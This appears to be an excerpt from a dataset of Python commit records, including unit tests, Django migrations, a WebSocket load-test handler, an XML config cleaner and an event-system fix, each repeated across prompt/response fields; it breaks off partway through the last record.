Dataset schema (per-column types and string-length ranges as reported by the dataset viewer):

- commit: string, 40 chars
- old_file: string, 4–118 chars
- new_file: string, 4–118 chars
- old_contents: string, 0–2.94k chars
- new_contents: string, 1–4.43k chars
- subject: string, 15–444 chars
- message: string, 16–3.45k chars
- lang: string, 1 distinct value (Python)
- license: string, 13 distinct values
- repos: string, 5–43.2k chars
- prompt: string, 17–4.58k chars (derived: the commit message)
- response: string, 1–4.43k chars (derived: the new file contents)
- prompt_tagged: string, 58–4.62k chars (derived: old contents and message wrapped in <commit_before>/<commit_msg>/<commit_after> tags)
- response_tagged: string, 1–4.43k chars (derived: the new file contents)
- text: string, 132–7.29k chars (derived: prompt and response concatenated)
- text_tagged: string, 173–7.33k chars (derived: tagged prompt and response concatenated)
commit: 943c8bb558f0a951b190b598f12069d06b6e3041
old_file / new_file: tests/sim/test_entities.py
new_contents:
import unittest
from hunting.sim.entities import *
class TestFighter(unittest.TestCase):
def test_base_speed_must_be_positive(self):
with self.assertRaises(ValueError):
Fighter(1, 1, 1, 1, base_speed=-5)
with self.assertRaises(ValueError):
Fighter(1, 1, 1, 1, base_speed=0)
with self.assertRaises(ValueError):
f = Fighter(1, 1, 1, 1)
f.base_speed = -1
with self.assertRaises(ValueError):
f = Fighter(1, 1, 1, 1)
f.base_speed = 0

subject / message: Add test to constrain speed to positive
lang: Python
license: mit
repos: MoyTW/RL_Arena_Experiment
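The test pins the contract both at construction time and on later assignment, which implies a validating property rather than a plain attribute. A minimal sketch of a Fighter that would pass it; the four positional parameters and the default speed are assumptions, since hunting.sim.entities is not shown:

```python
class Fighter:
    def __init__(self, power, armor, hp, xp, base_speed=100):
        self.power, self.armor, self.hp, self.xp = power, armor, hp, xp
        self.base_speed = base_speed  # routed through the validating setter

    @property
    def base_speed(self):
        return self._base_speed

    @base_speed.setter
    def base_speed(self, value):
        if value <= 0:  # reject zero and negatives, as the test demands
            raise ValueError('base_speed must be greater than 0')
        self._base_speed = value
```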
commit: a3ac011c35fa8918a4828a2c6eb119d5ca18a857
old_file / new_file: src/example/bench_wsh.py
new_contents:
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A simple load tester for WebSocket clients.
A client program sends a message formatted as "<time> <count> <message>" to
this handler. This handler starts sending total <count> WebSocket messages
containing <message> every <time> seconds. <time> can be a floating point
value. <count> must be an integer value.
"""
import time
def web_socket_do_extra_handshake(request):
pass # Always accept.
def web_socket_transfer_data(request):
line = request.ws_stream.receive_message()
parts = line.split(' ')
if len(parts) != 3:
raise ValueError('Bad parameter format')
wait = float(parts[0])
count = int(parts[1])
message = parts[2]
for i in xrange(count):
request.ws_stream.send_message(message)
time.sleep(wait)
# vi:sts=4 sw=4 et

subject: Add a handler for performing client load testing.
message: Add a handler for performing client load testing.
Review URL: http://codereview.appspot.com/3844044
lang: Python
license: bsd-3-clause
repos: google/pywebsocket, googlearchive/pywebsocket, GoogleChromeLabs/pywebsocket3
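The commit ships only the server-side handler; driving it requires a client that speaks the "<time> <count> <message>" line described in the docstring. A hedged sketch using the third-party websocket-client package (the URL and resource path are illustrative, not part of the commit):

```python
from websocket import create_connection  # pip install websocket-client

def run_load_test(url, wait, count, message):
    """Request `count` copies of `message`, one every `wait` seconds."""
    ws = create_connection(url)
    ws.send('%s %d %s' % (wait, count, message))
    received = [ws.recv() for _ in range(count)]  # one recv per expected message
    ws.close()
    return received

# e.g. run_load_test('ws://localhost:8880/example/bench', 0.01, 1000, 'x' * 128)
```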
commit: eafd68dd70d24f6e5551e2f59d7c13e4be6dce6e
old_file / new_file: testparser.py
new_contents:
#!/usr/bin/env python
import sys
import os
import subprocess
# ARGUMENTS:
# 1 - path to the parser executable
# 2 - path to the parser-lalr executable
# 3 - path to the source directory to look for *.rs files
parser = sys.argv[1]
parser_lalr = sys.argv[2]
# flex dies on multibyte characters
BLACKLIST = ['libstd/str.rs', 'libstd/strbuf.rs', 'libstd/ascii.rs']
def chk(*args, **kwargs):
return subprocess.check_output(*args, **kwargs)
def compare(p):
if chk(flex, stdin=open(p)) != chk(rlex, stdin=open(p)):
raise Exception("{} differed between the reference lexer and libsyntax's lexer".format(p))
total = 0
parser_ok = 0
parser_lalr_ok = 0
bad_parser = []
bad_parser_lalr = []
print "\n"
for base, dirs, files in os.walk(sys.argv[3]):
for f in filter(lambda p: p.endswith('.rs'), files):
p = os.path.join(base, f)
if any([p.endswith(b) for b in BLACKLIST]):
continue
total += 1
try:
if len(chk(parser, stdin=open(p), stderr=subprocess.STDOUT)) == 0:
parser_ok += 1
else:
bad_parser.append(p)
except subprocess.CalledProcessError:
bad_parser.append(p)
pass
try:
if "syntax error" not in chk(parser_lalr, stdin=open(p), stderr=subprocess.STDOUT):
parser_lalr_ok += 1
else:
bad_parser_lalr.append(p)
except subprocess.CalledProcessError:
bad_parser_lalr.append(p)
pass
sys.stdout.write("\r total: %d, parser: %d, parser-lalr: %d, scanned %-60s" %
(total, parser_ok, parser_lalr_ok, p))
print "\n"
for (filename, bad, parser) in [("parser.bad", bad_parser, parser),
("parser-lalr.bad", bad_parser_lalr, parser_lalr)]:
print("writing %d files that failed to parse with %s to %s" % (len(bad), parser, filename))
with open(filename, "w") as f:
for p in bad:
f.write(p)
f.write("\n")

subject / message: Add a new test script to evaluate status of different parsers.
lang: Python
license: mit
repos: patperry/rust-grammar, bleibig/rust-grammar
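Two details worth noting: compare() references flex and rlex, which are never defined in this file (apparently left over from a lexer-comparison harness) and is never called; and the script is Python 2 (bare print statements, xrange). A compact Python 3 sketch of the same feed-and-tally loop for a single parser; check_output returns bytes in Python 3, and success here means empty output, matching the script's test for the first parser:

```python
#!/usr/bin/env python3
import os
import subprocess
import sys

def parses_cleanly(executable, path):
    """Feed `path` to `executable` on stdin; True if output is empty."""
    try:
        with open(path, 'rb') as source:
            out = subprocess.check_output([executable], stdin=source,
                                          stderr=subprocess.STDOUT)
        return len(out) == 0
    except subprocess.CalledProcessError:
        return False

if __name__ == '__main__':
    parser, srcdir = sys.argv[1], sys.argv[2]
    ok = bad = 0
    for base, _dirs, files in os.walk(srcdir):
        for name in files:
            if name.endswith('.rs'):
                if parses_cleanly(parser, os.path.join(base, name)):
                    ok += 1
                else:
                    bad += 1
    print('ok: %d, failed: %d' % (ok, bad))
```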
commit: 3cb168f79a5239068f5ed0c3fa51f530f4a37f05
old_file / new_file: members/crm/migrations/0014_auto_20190117_0402.py
new_contents:
# -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2019-01-17 04:02
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('crm', '0013_profile_squashed'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='user',
),
migrations.DeleteModel(
name='Profile',
),
]

subject / message: Remove profile until QBO integration gets merged in
lang: Python
license: mit
repos: ocwc/ocwc-members
commit: a7ff8375e945a7522ede57ef98c130b40aaf98b0
old_file / new_file: helper_scripts/clean_tool_conf_xml.py
new_contents:
#!/usr/bin/env python
## Example usage: python clean_tool_conf.py -i /galaxy/config/shed_tool_conf.xml -o clean_shed_tool_conf.xml
import xml.etree.ElementTree as ET
from os import path
from argparse import ArgumentParser
def check_child(root, children, tooldir, removed_tools = []):
"""
For each child in children, check if child is tool. If it does not, check
if child is section. If it is, recurse into section.
If it has a file attribute, check if the path exists, else remove child from root.
"""
for child in children:
if child.tag == "section":
check_child(root = children,
children = child.getchildren(),
tooldir = tooldir,
removed_tools = removed_tools)
elif child.tag == "tool":
if path.exists( path.join (tooldir, child.attrib["file"])):
pass
else:
children.remove(child)
removed_tools.append(child.attrib["file"])
return removed_tools
def _parse_cli_options():
"""
Parse command line options, returning `parse_args` from `ArgumentParser`.
"""
parser = ArgumentParser(usage="usage: python %(prog)s <options>")
parser.add_argument("-i", "--input",
dest="input_xml",
required=True,
help="shed_tool_conf.xml or migrated_tool_conf.xml \
that needs to be cleaned from non-existant entries." )
parser.add_argument("-o", "--output_xml",
required=True,
dest="output_xml",
help="Output file for cleaned xml")
return parser.parse_args()
def __main__():
args = _parse_cli_options()
input_xml=args.input_xml
output_xml=args.output_xml
tree = ET.parse(input_xml)
root = tree.getroot()
tooldir = root.attrib["tool_path"]
children = root.getchildren()
removed_tools = check_child(root, children, tooldir)
print "tool xml not found for the follwing tools, removing entries from output xml:"
for tool in removed_tools:
print tool
with open(output_xml, "w") as output:
output.write(ET.tostring(root))
if __name__ == "__main__":
__main__()

subject / message: Add script that removes non-existent xml entries from shed_tool_conf.xml and migrated_tool_conf.xml
lang: Python
license: mit
repos: ARTbio/tools-artbio, mvdbeek/tools-artbio, JuPeg/tools-artbio, chamaelj/tools-artbio, drosofff/tools-artbio
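Two pitfalls in this script deserve a note: the mutable default removed_tools=[] is shared across separate top-level calls of check_child, and calling children.remove(child) on the very list being iterated makes the loop skip the element that follows each removal, so consecutive stale entries can survive a single pass. A hedged Python 3 sketch of the same traversal without either issue (getchildren() was removed in Python 3.9; Element objects iterate over their children directly):

```python
import xml.etree.ElementTree as ET
from os import path

def check_child(parent, tooldir, removed_tools=None):
    """Recursively drop <tool> entries whose xml file no longer exists."""
    if removed_tools is None:
        removed_tools = []
    for child in list(parent):  # iterate a copy so removal is safe
        if child.tag == 'section':
            check_child(child, tooldir, removed_tools)
        elif child.tag == 'tool':
            if not path.exists(path.join(tooldir, child.attrib['file'])):
                parent.remove(child)
                removed_tools.append(child.attrib['file'])
    return removed_tools
```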
commit: 81e3e688aba1ec18b80188077b664e1a85d1e717
old_file / new_file: src/events.py
old_contents:
# event system
EVENT_CALLBACKS = {}
def add_listener(event, callback, priority = 5):
if event not in EVENT_CALLBACKS:
EVENT_CALLBACKS[event] = []
if (priority, callback) not in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].append((priority, callback))
EVENT_CALLBACKS[event].sort(key = lambda x: x[0])
def remove_listener(event, callback, priority = 5):
if event in EVENT_CALLBACKS and (priority, callback) in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].remove((priority, callback))
class Event:
def __init__(self, name, data):
self.stop_processing = False
self.prevent_default = False
self.name = name
self.data = data
def dispatch(self, *args):
if self.name not in EVENT_CALLBACKS:
return
for item in list(EVENT_CALLBACKS[self.name]):
item[1](self, *args)
if self.stop_processing:
break
return not self.prevent_default
# vim: set expandtab:sw=4:ts=4:

new_contents:
# event system
EVENT_CALLBACKS = {}
def add_listener(event, callback, priority = 5):
if event not in EVENT_CALLBACKS:
EVENT_CALLBACKS[event] = []
if (priority, callback) not in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].append((priority, callback))
EVENT_CALLBACKS[event].sort(key = lambda x: x[0])
def remove_listener(event, callback, priority = 5):
if event in EVENT_CALLBACKS and (priority, callback) in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].remove((priority, callback))
class Event:
def __init__(self, name, data):
self.stop_processing = False
self.prevent_default = False
self.name = name
self.data = data
def dispatch(self, *args):
if self.name not in EVENT_CALLBACKS:
return True
for item in list(EVENT_CALLBACKS[self.name]):
item[1](self, *args)
if self.stop_processing:
break
return not self.prevent_default
# vim: set expandtab:sw=4:ts=4:

subject / message: Fix Event.dispatch to return True if execution is to proceed
lang: Python
license: bsd-2-clause
repos: billion57/lykos, Agent-Isai/lykos, Cr0wb4r/lykos, Diitto/lykos
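The one-line change matters because callers read the return value as "run the default behavior": before the fix, dispatching an event with no registered listeners returned None, which is falsy and silently suppressed the default. A usage sketch against the module as committed (handler and event names are illustrative):

```python
from events import Event, add_listener

def on_join(evt, player):
    if player == 'banned':           # a listener can veto the default action
        evt.prevent_default = True
        evt.stop_processing = True

add_listener('join', on_join)

assert Event('join', {}).dispatch('alice') is True    # no veto: proceed
assert Event('join', {}).dispatch('banned') is False  # vetoed
assert Event('part', {}).dispatch('alice') is True    # no listeners: proceed (the fix)
```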
commit: 8c54e99f0a53b678ea14a850bed8cf9f6dd3c8bb
old_file / new_file: metaci/build/tests/test_rq_tasks.py
new_contents:
# Lots of work to be done here!!!!
from unittest import mock
from django.test import TestCase
from metaci.build.tasks import check_queued_build
from metaci.conftest import (
BuildFactory,
OrgFactory,
PlanFactory,
PlanRepositoryFactory,
RepositoryFactory,
)
@mock.patch("metaci.build.tasks.reset_database_connection")
class TestRunBuild(TestCase):
@mock.patch("metaci.build.management.commands.run_build.scratch_org_limits")
@mock.patch("metaci.build.tasks.lock_org")
@mock.patch("metaci.build.models.Build.run")
def test_lock_set(
self, run, lock_org, scratch_org_limits, reset_database_connection
):
build_timeout = 100
repo = RepositoryFactory(name="myrepo")
OrgFactory(name="myorg", repo=repo, scratch=False)
plan = PlanFactory(name="myplan", org="myorg", build_timeout=build_timeout)
build = BuildFactory(repo=repo, plan=plan)
PlanRepositoryFactory(repo=repo, plan=plan)
check_queued_build(build.id)
print(lock_org.mock_calls)
assert lock_org.mock_calls
assert lock_org.mock_calls[0][1][2] == build_timeout

subject / message: Test the RQ task as well.
lang: Python
license: bsd-3-clause
repos: SalesforceFoundation/mrbelvedereci
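The final assertion indexes into the raw mock-call tuple: mock_calls[0][1] is the positional-argument tuple of the first recorded call, so [1][2] is its third positional argument, presumably the timeout passed to lock_org. An equivalent, more self-describing form for that last line of the test (unittest.mock call objects unpack as (name, args, kwargs)):

```python
name, args, kwargs = lock_org.mock_calls[0]
assert args[2] == build_timeout  # third positional argument: the lock timeout
```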
commit: dacbb2ea0b9090a4783253259dced055da05ef26
old_file / new_file: journal_abbreviations.py
new_contents:
"""Some additional journal abbreviations which are not provided by Crossref."""
JOURNAL_ABBRVS = {
"American Journal of Mathematics": "Am. J. Math.",
"American Journal of Physics": "Am. J. Phys",
"Annals of Physics": "Ann. Phys.",
"Communications in Mathematical Physics": "Commun. Math. Phys.",
"Journal of Mathematical Physics": "J. Math. Phys.",
"Journal of Statistical Physics": "J. Stat. Phys.",
"Nature Physics": "Nat. Phys.",
"Nuclear Physics B": "Nucl. Phys. B",
"Physics Letters A": "Phys. Lett. A"
}

subject / message: Refactor journal abbreviations into separate file
lang: Python
license: mit
repos: teunzwart/latex-production-tools
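Note the missing trailing period in "Am. J. Phys", presumably an oversight in the source data. A usage sketch (module name as committed; dict.get keeps titles without a known abbreviation unchanged):

```python
from journal_abbreviations import JOURNAL_ABBRVS

def abbreviate(title):
    """Return the abbreviated journal title, or the title itself if unknown."""
    return JOURNAL_ABBRVS.get(title, title)

assert abbreviate('Annals of Physics') == 'Ann. Phys.'
assert abbreviate('Journal of Made-Up Results') == 'Journal of Made-Up Results'
```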
commit: 60d307ac3f4edf4eb47e0ff4d67347345a2965f3
old_file / new_file: zerver/migrations/0257_fix_has_link_attribute.py
new_contents:
# -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-10-07 05:25
from __future__ import unicode_literals
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
import lxml
def fix_has_link(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
Message = apps.get_model('zerver', 'Message')
for message in Message.objects.all():
# Because we maintain the Attachment table, this should be as
# simple as just just checking if there's any Attachment
# objects associated with this message.
has_attachment = message.attachment_set.exists()
# For has_link and has_image, we need to parse the messages.
# Links are simple -- look for a link in the message.
lxml_obj = lxml.html.fromstring(message.rendered_content)
has_link = False
for link in lxml_obj.xpath("//a"):
has_link = True
break
# has_image refers to inline image previews, so we just check
# for the relevant CSS class.
has_image = False
for img in lxml_obj.find_class("message_inline_image"):
has_image = True
break
if (message.has_link == has_link and
message.has_attachment == has_attachment and
message.has_image == has_image):
# No need to spend time with the database if there aren't changes.
continue
message.has_image = has_image
message.has_link = has_link
message.has_attachment = has_attachment
message.save(update_fields=['has_link', 'has_attachment', 'has_image'])
class Migration(migrations.Migration):
dependencies = [
('zerver', '0256_userprofile_stream_set_recipient_column_values'),
]
operations = [
migrations.RunPython(fix_has_link,
reverse_code=migrations.RunPython.noop),
]
|
Add migrations to correct has_* fields.
|
message: Add migrations to correct has_* fields.
This follows up on changes to correctly set has_link, has_attachment,
and has_image when rendering messages.
Fixes #12912.
|
Python
|
apache-2.0
|
timabbott/zulip,hackerkid/zulip,punchagan/zulip,punchagan/zulip,showell/zulip,rht/zulip,andersk/zulip,synicalsyntax/zulip,andersk/zulip,showell/zulip,zulip/zulip,eeshangarg/zulip,synicalsyntax/zulip,showell/zulip,synicalsyntax/zulip,rht/zulip,timabbott/zulip,zulip/zulip,eeshangarg/zulip,brainwane/zulip,rht/zulip,rht/zulip,shubhamdhama/zulip,kou/zulip,brainwane/zulip,zulip/zulip,timabbott/zulip,shubhamdhama/zulip,zulip/zulip,rht/zulip,kou/zulip,brainwane/zulip,eeshangarg/zulip,zulip/zulip,brainwane/zulip,eeshangarg/zulip,eeshangarg/zulip,timabbott/zulip,shubhamdhama/zulip,zulip/zulip,synicalsyntax/zulip,punchagan/zulip,kou/zulip,synicalsyntax/zulip,andersk/zulip,eeshangarg/zulip,rht/zulip,shubhamdhama/zulip,brainwane/zulip,hackerkid/zulip,punchagan/zulip,brainwane/zulip,synicalsyntax/zulip,eeshangarg/zulip,hackerkid/zulip,synicalsyntax/zulip,shubhamdhama/zulip,andersk/zulip,showell/zulip,showell/zulip,hackerkid/zulip,hackerkid/zulip,hackerkid/zulip,brainwane/zulip,kou/zulip,punchagan/zulip,shubhamdhama/zulip,punchagan/zulip,timabbott/zulip,showell/zulip,kou/zulip,kou/zulip,zulip/zulip,showell/zulip,hackerkid/zulip,andersk/zulip,timabbott/zulip,shubhamdhama/zulip,rht/zulip,timabbott/zulip,andersk/zulip,punchagan/zulip,kou/zulip,andersk/zulip
|
message: Add migrations to correct has_* fields.
This follows up on changes to correctly set has_link, has_attachment,
and has_image when rendering messages.
Fixes #12912.
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-10-07 05:25
from __future__ import unicode_literals
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
import lxml.html
def fix_has_link(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
Message = apps.get_model('zerver', 'Message')
for message in Message.objects.all():
# Because we maintain the Attachment table, this should be as
        # simple as just checking if there are any Attachment
# objects associated with this message.
has_attachment = message.attachment_set.exists()
# For has_link and has_image, we need to parse the messages.
# Links are simple -- look for a link in the message.
lxml_obj = lxml.html.fromstring(message.rendered_content)
has_link = False
for link in lxml_obj.xpath("//a"):
has_link = True
break
# has_image refers to inline image previews, so we just check
# for the relevant CSS class.
has_image = False
for img in lxml_obj.find_class("message_inline_image"):
has_image = True
break
if (message.has_link == has_link and
message.has_attachment == has_attachment and
message.has_image == has_image):
# No need to spend time with the database if there aren't changes.
continue
message.has_image = has_image
message.has_link = has_link
message.has_attachment = has_attachment
message.save(update_fields=['has_link', 'has_attachment', 'has_image'])
class Migration(migrations.Migration):
dependencies = [
('zerver', '0256_userprofile_stream_set_recipient_column_values'),
]
operations = [
migrations.RunPython(fix_has_link,
reverse_code=migrations.RunPython.noop),
]
|
<commit_before><commit_msg>message: Add migrations to correct has_* fields.
This follows up on changes to correctly set has_link, has_attachment,
and has_image when rendering messages.
Fixes #12912.<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-10-07 05:25
from __future__ import unicode_literals
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
import lxml.html
def fix_has_link(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
Message = apps.get_model('zerver', 'Message')
for message in Message.objects.all():
# Because we maintain the Attachment table, this should be as
        # simple as just checking if there are any Attachment
# objects associated with this message.
has_attachment = message.attachment_set.exists()
# For has_link and has_image, we need to parse the messages.
# Links are simple -- look for a link in the message.
lxml_obj = lxml.html.fromstring(message.rendered_content)
has_link = False
for link in lxml_obj.xpath("//a"):
has_link = True
break
# has_image refers to inline image previews, so we just check
# for the relevant CSS class.
has_image = False
for img in lxml_obj.find_class("message_inline_image"):
has_image = True
break
if (message.has_link == has_link and
message.has_attachment == has_attachment and
message.has_image == has_image):
# No need to spend time with the database if there aren't changes.
continue
message.has_image = has_image
message.has_link = has_link
message.has_attachment = has_attachment
message.save(update_fields=['has_link', 'has_attachment', 'has_image'])
class Migration(migrations.Migration):
dependencies = [
('zerver', '0256_userprofile_stream_set_recipient_column_values'),
]
operations = [
migrations.RunPython(fix_has_link,
reverse_code=migrations.RunPython.noop),
]
|
message: Add migrations to correct has_* fields.
This follows up on changes to correctly set has_link, has_attachment,
and has_image when rendering messages.
Fixes #12912.# -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-10-07 05:25
from __future__ import unicode_literals
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
import lxml.html
def fix_has_link(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
Message = apps.get_model('zerver', 'Message')
for message in Message.objects.all():
# Because we maintain the Attachment table, this should be as
# simple as just just checking if there's any Attachment
# objects associated with this message.
has_attachment = message.attachment_set.exists()
# For has_link and has_image, we need to parse the messages.
# Links are simple -- look for a link in the message.
lxml_obj = lxml.html.fromstring(message.rendered_content)
has_link = False
for link in lxml_obj.xpath("//a"):
has_link = True
break
# has_image refers to inline image previews, so we just check
# for the relevant CSS class.
has_image = False
for img in lxml_obj.find_class("message_inline_image"):
has_image = True
break
if (message.has_link == has_link and
message.has_attachment == has_attachment and
message.has_image == has_image):
# No need to spend time with the database if there aren't changes.
continue
message.has_image = has_image
message.has_link = has_link
message.has_attachment = has_attachment
message.save(update_fields=['has_link', 'has_attachment', 'has_image'])
class Migration(migrations.Migration):
dependencies = [
('zerver', '0256_userprofile_stream_set_recipient_column_values'),
]
operations = [
migrations.RunPython(fix_has_link,
reverse_code=migrations.RunPython.noop),
]
|
<commit_before><commit_msg>message: Add migrations to correct has_* fields.
This follows up on changes to correctly set has_link, has_attachment,
and has_image when rendering messages.
Fixes #12912.<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-10-07 05:25
from __future__ import unicode_literals
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
import lxml.html
def fix_has_link(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
Message = apps.get_model('zerver', 'Message')
for message in Message.objects.all():
# Because we maintain the Attachment table, this should be as
        # simple as just checking if there are any Attachment
# objects associated with this message.
has_attachment = message.attachment_set.exists()
# For has_link and has_image, we need to parse the messages.
# Links are simple -- look for a link in the message.
lxml_obj = lxml.html.fromstring(message.rendered_content)
has_link = False
for link in lxml_obj.xpath("//a"):
has_link = True
break
# has_image refers to inline image previews, so we just check
# for the relevant CSS class.
has_image = False
for img in lxml_obj.find_class("message_inline_image"):
has_image = True
break
if (message.has_link == has_link and
message.has_attachment == has_attachment and
message.has_image == has_image):
# No need to spend time with the database if there aren't changes.
continue
message.has_image = has_image
message.has_link = has_link
message.has_attachment = has_attachment
message.save(update_fields=['has_link', 'has_attachment', 'has_image'])
class Migration(migrations.Migration):
dependencies = [
('zerver', '0256_userprofile_stream_set_recipient_column_values'),
]
operations = [
migrations.RunPython(fix_has_link,
reverse_code=migrations.RunPython.noop),
]
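To see the migration's detection logic in isolation, here is a small self-contained sketch run on an invented rendered-message string; note that bool() on the lxml node lists gives the same answer as the early-exit loops above:

import lxml.html

sample = ('<p>See <a href="https://example.com">this link</a></p>'
          '<div class="message_inline_image"><img src="x.png"></div>')

tree = lxml.html.fromstring(sample)
has_link = bool(tree.xpath("//a"))                         # True: one anchor tag
has_image = bool(tree.find_class("message_inline_image"))  # True: one inline preview
print(has_link, has_image)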
|
|
91133ca23b6fb2ad1fc888742ea78be0f849290e
|
henrste/test-simple.py
|
henrste/test-simple.py
|
#!/usr/bin/env python3
from framework.test_framework import Testbed, TestEnv, require_on_aqm_node
from framework.test_utils import *
def test_simple():
def my_test(testcase):
testcase.run_greedy(node='a', tag='node-a')
testcase.run_greedy(node='b', tag='node-b')
testbed = Testbed()
testbed.ta_samples = 10
testbed.ta_idle = 2
testbed.ta_delay = 500
testbed.cc('a', 'cubic', testbed.ECN_ALLOW)
testbed.cc('b', 'dctcp-drop', testbed.ECN_INITIATE)
run_test(
folder='results/simple',
title='Just a simple test to verify setup',
testenv=TestEnv(testbed),
steps=(
branch_sched([
('pi2',
'PI2: dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t\\\\_shift 30ms l\\\\_drop 100',
lambda testbed: testbed.aqm_pi2(params='dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t_shift 30ms l_drop 100')),
('pie', 'PIE', lambda testbed: testbed.aqm_pie('ecn target 15ms tupdate 15ms alpha 1 beta 10 ecndrop 25')),
#('pfifo', 'pfifo', lambda testbed: testbed.aqm_pfifo()),
]),
branch_rtt([10, 50, 100], title='%d'),
plot_swap(),
branch_runif([
('iftest-1', lambda testenv: True, 'if test 1'),
('iftest-2', lambda testenv: True, 'if test 2'),
]),
plot_swap(),
branch_bitrate([100]),
plot_swap(-2),
plot_swap(-1),
branch_repeat(3),
#step_skipif(lambda testenv: True),
my_test,
)
)
if __name__ == '__main__':
require_on_aqm_node()
test_simple()
|
Add test for demonstrating new test utilities
|
Add test for demonstrating new test utilities
|
Python
|
mit
|
henrist/aqmt,henrist/aqmt,henrist/aqmt,henrist/aqmt
|
Add test for demonstrating new test utilities
|
#!/usr/bin/env python3
from framework.test_framework import Testbed, TestEnv, require_on_aqm_node
from framework.test_utils import *
def test_simple():
def my_test(testcase):
testcase.run_greedy(node='a', tag='node-a')
testcase.run_greedy(node='b', tag='node-b')
testbed = Testbed()
testbed.ta_samples = 10
testbed.ta_idle = 2
testbed.ta_delay = 500
testbed.cc('a', 'cubic', testbed.ECN_ALLOW)
testbed.cc('b', 'dctcp-drop', testbed.ECN_INITIATE)
run_test(
folder='results/simple',
title='Just a simple test to verify setup',
testenv=TestEnv(testbed),
steps=(
branch_sched([
('pi2',
'PI2: dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t\\\\_shift 30ms l\\\\_drop 100',
lambda testbed: testbed.aqm_pi2(params='dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t_shift 30ms l_drop 100')),
('pie', 'PIE', lambda testbed: testbed.aqm_pie('ecn target 15ms tupdate 15ms alpha 1 beta 10 ecndrop 25')),
#('pfifo', 'pfifo', lambda testbed: testbed.aqm_pfifo()),
]),
branch_rtt([10, 50, 100], title='%d'),
plot_swap(),
branch_runif([
('iftest-1', lambda testenv: True, 'if test 1'),
('iftest-2', lambda testenv: True, 'if test 2'),
]),
plot_swap(),
branch_bitrate([100]),
plot_swap(-2),
plot_swap(-1),
branch_repeat(3),
#step_skipif(lambda testenv: True),
my_test,
)
)
if __name__ == '__main__':
require_on_aqm_node()
test_simple()
|
<commit_before><commit_msg>Add test for demonstrating new test utilities<commit_after>
|
#!/usr/bin/env python3
from framework.test_framework import Testbed, TestEnv, require_on_aqm_node
from framework.test_utils import *
def test_simple():
def my_test(testcase):
testcase.run_greedy(node='a', tag='node-a')
testcase.run_greedy(node='b', tag='node-b')
testbed = Testbed()
testbed.ta_samples = 10
testbed.ta_idle = 2
testbed.ta_delay = 500
testbed.cc('a', 'cubic', testbed.ECN_ALLOW)
testbed.cc('b', 'dctcp-drop', testbed.ECN_INITIATE)
run_test(
folder='results/simple',
title='Just a simple test to verify setup',
testenv=TestEnv(testbed),
steps=(
branch_sched([
('pi2',
'PI2: dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t\\\\_shift 30ms l\\\\_drop 100',
lambda testbed: testbed.aqm_pi2(params='dualq target 15ms tupdate 15ms alpha 5 beta 50 sojourn k 2 t_shift 30ms l_drop 100')),
('pie', 'PIE', lambda testbed: testbed.aqm_pie('ecn target 15ms tupdate 15ms alpha 1 beta 10 ecndrop 25')),
#('pfifo', 'pfifo', lambda testbed: testbed.aqm_pfifo()),
]),
branch_rtt([10, 50, 100], title='%d'),
plot_swap(),
branch_runif([
('iftest-1', lambda testenv: True, 'if test 1'),
('iftest-2', lambda testenv: True, 'if test 2'),
]),
plot_swap(),
branch_bitrate([100]),
plot_swap(-2),
plot_swap(-1),
